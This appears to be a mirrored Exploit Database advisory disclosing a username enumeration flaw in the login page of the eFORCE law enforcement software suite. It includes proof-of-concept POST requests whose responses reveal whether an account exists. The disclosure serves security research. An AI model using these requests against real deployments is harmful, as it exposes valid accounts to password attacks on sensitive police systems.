IntelliChoice eFORCE Software Suite 2.5.9 – Username Enumeration

• Exploit Database
• 16 阅读

• 作者： LiquidWorm
  日期： 2021-07-29
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/50164/

• # Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration
  # Date: 03.05.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.eforcesoftware.com
  
  IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration
  
  
  Vendor: IntelliChoice, Inc.
  Product web page: https://www.eforcesoftware.com
  Affected version: 2.5.9.6
  2.5.9.5
  2.5.9.3
  2.5.9.2
  2.5.9.1
  2.5.8.0
  2.5.7.20
  2.5.7.18
  2.5.6.18
  2.5.4.6
  2.5.3.11
  
  Summary: IntelliChoice is a United States software company that was
  founded in 2003, and offers a software title called eFORCE Software
  Suite. eFORCE Software Suite is law enforcement software, and includes
  features such as case management, court management, crime scene management,
  criminal database, dispatching, evidence management, field reporting,
  scheduling, court management integration, certification management,
  and incident mapping. With regards to system requirements, eFORCE
  Software Suite is available as SaaS, Windows, iPhone, and iPad software.
  
  Desc: The weakness is caused due to the login script and how it verifies
  provided credentials. Attacker can use this weakness to enumerate valid
  users on the affected application via 'ctl00$MainContent$UserName' POST
  parameter.
  
  Tested on: Microsoft-IIS/10.0
   Microsoft-IIS/8.5
   ASP.NET/4.0.30319
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5658
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php
  
  
  03.05.2021
  
  --
  
  
  Request/response for existent username:
  ---------------------------------------
  
  POST /eFORCECommand/Account/Login.aspx HTTP/1.1
  
  __LASTFOCUS: 
  __EVENTTARGET: 
  __EVENTARGUMENT: 
  __VIEWSTATE: Xxx
  __VIEWSTATEGENERATOR: 4A5A1A0F
  __EVENTVALIDATION: Xxx
  ctl00$MainContent$UserName: eforce
  ctl00$MainContent$Password: 123456
  ctl00$MainContent$btnLogin.x: 20
  ctl00$MainContent$btnLogin.y: 7
  
  
  Response:
  Invalid password entered for username eforce.
  
  
  
  Request/response for non-existent username:
  -------------------------------------------
  
  POST /eFORCECommand/Account/Login.aspx HTTP/1.1
  
  __LASTFOCUS: 
  __EVENTTARGET: 
  __EVENTARGUMENT: 
  __VIEWSTATE: Xxx
  __VIEWSTATEGENERATOR: 4A5A1A0F
  __EVENTVALIDATION: Xxx
  ctl00$MainContent$UserName: testingus
  ctl00$MainContent$Password: 123456
  ctl00$MainContent$btnLogin.x: 20
  ctl00$MainContent$btnLogin.y: 7
  
  
  Response:
  Unable to login: User name testingus is not registered.